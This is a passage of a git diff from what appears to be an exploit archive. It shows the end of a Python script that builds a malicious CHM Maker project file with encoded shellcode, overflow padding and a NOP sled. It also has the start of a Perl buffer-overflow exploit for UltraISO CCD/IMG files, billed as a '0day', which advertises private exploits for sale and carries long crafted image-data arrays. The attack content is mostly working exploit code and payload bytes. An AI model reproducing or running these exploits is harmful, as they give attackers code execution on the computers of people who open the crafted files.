+"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61" +"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32" +"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d" +"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c" +"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75" +"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36" +"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f" +"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69" +"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b" +"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54" +"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45" +"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b" +"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f" +"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65" +"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b" +"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51" +"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f" +"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30" 
+"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41" +"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61") + +header1 = ( +'<?xml version="1.0" encoding="Windows-1252" ?>\n' +'<XMLConfig><info>Chm Maker project</info>\n' +'<group name="Contents">\n' +' <group name="0">\n' +' <param name="Caption">filename</param>\n' +' <param name="Level">0</param>\n' +' <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000) + +header2 = ( +'</param>\n' +' </group>\n' +' <param name="Count">1</param>\n' +'</group>\n' +'<group name="Keywords">\n' +' <param name="Count">0</param>\n' +'</group>\n' +'<group name="KeywordsFinder">\n' +' <param name="UseMeta">1</param>\n' +' <param name="UseBold">1</param>\n' +' <param name="UseItalic">0</param>\n' +' <param name="UseUnder">0</param>\n' +' <param name="UseHTag">1</param>\n' +' <param name="UseTabHeader">0</param>\n' +' <param name="MaxKeyLength">32</param>\n' +' <param name="LiveUpdate">0</param>\n' +'</group>\n' +'<group name="Customize">\n' +' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n' +' <param name="DefaultPage"></param>\n' +' <param name="Left">0</param>\n' +' <param name="Top">0</param>\n' +' <param name="Width">0</param>\n' +' <param name="Heigth">0</param>\n' +' <param name="HideShow">1</param>\n' +' <param name="Back">1</param>\n' +' <param name="Forward">1</param>\n' +' <param name="Stop">0</param>\n' +' <param name="Refresh">0</param>\n' +' <param name="Options">1</param>\n' +' <param name="Print">1</param>\n' +' <param name="Font">0</param>\n' +' <param name="Locate">0</param>\n' +' <param name="Home">0</param>\n' +' <param name="HomePage"></param>\n' +' <param name="Jump1">0</param>\n' +' <param name="Jump1Page"></param>\n' +' <param name="Jump1Title"></param>\n' +' <param name="Jump2">0</param>\n' +' <param name="Jump2Page"></param>\n' +' <param name="Jump2Title"></param>\n' +' <param name="Search">1</param>\n' +' <param name="AdditionalFiles"></param>\n' +'</group>\n' +'</XMLConfig>\n' 
+) + + +file=open('Devil_Inside.chmprj','w') +file.write(header1+header2) +file.close() + +# milw0rm.com [2009-03-30] diff --git a/platforms/windows/local/833.cpp b/platforms/windows/local/833.cpp index 9d7498df0..275a25f88 100755 --- a/platforms/windows/local/833.cpp +++ b/platforms/windows/local/833.cpp @@ -154,6 +154,6 @@ int main(void) return 0; -} - -// milw0rm.com [2005-02-22] +} + +// milw0rm.com [2005-02-22] diff --git a/platforms/windows/local/834.c b/platforms/windows/local/834.c index 55eff95b3..ef0ad8957 100755 --- a/platforms/windows/local/834.c +++ b/platforms/windows/local/834.c @@ -79,6 +79,6 @@ int main() } return 0; -} - -// milw0rm.com [2005-02-22] +} + +// milw0rm.com [2005-02-22] diff --git a/platforms/windows/local/8343.pl b/platforms/windows/local/8343.pl index 197f2a197..53fecc509 100755 --- a/platforms/windows/local/8343.pl +++ b/platforms/windows/local/8343.pl 
@@ -1,2608 +1,2608 @@
-#!/usr/bin/perl
-#
-# UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit
-# ----------------------------------------------------------------
-# Discovered and Exploited by SkD (skdrat@hotmail.com)
-#
-# A nice exploit for this software that was just recently
-# patched after a few other discoveries in it.
-# This is 0day at the moment and is very reliable.
-#
-# Just open either file CCD or IMG in UltraISO :).
-#
-# Another note is that the CCD will also cause an access violation
-# in MagicISO.
-#
-# Private exploits for sale, contact me at (skdrat@hotmail.com).
-#
-# WARNING: Author has no responsibility over the damage done
-# with this!
-use strict;
-use warnings;
-
-my $img_data1 = "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC5\x13\x68\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x00\xF5". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x52\x35\xB8\x7D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x97\x26\xD0\x56". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2D\x17". - "\x2E\x1B\xB1\x48\xB2\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x65\x00\xC2\x00\xE6\x00\x43\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x3C\x53\x75\x33\x2B\x25\x62\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00\xC1\x00\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x01\x01". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 
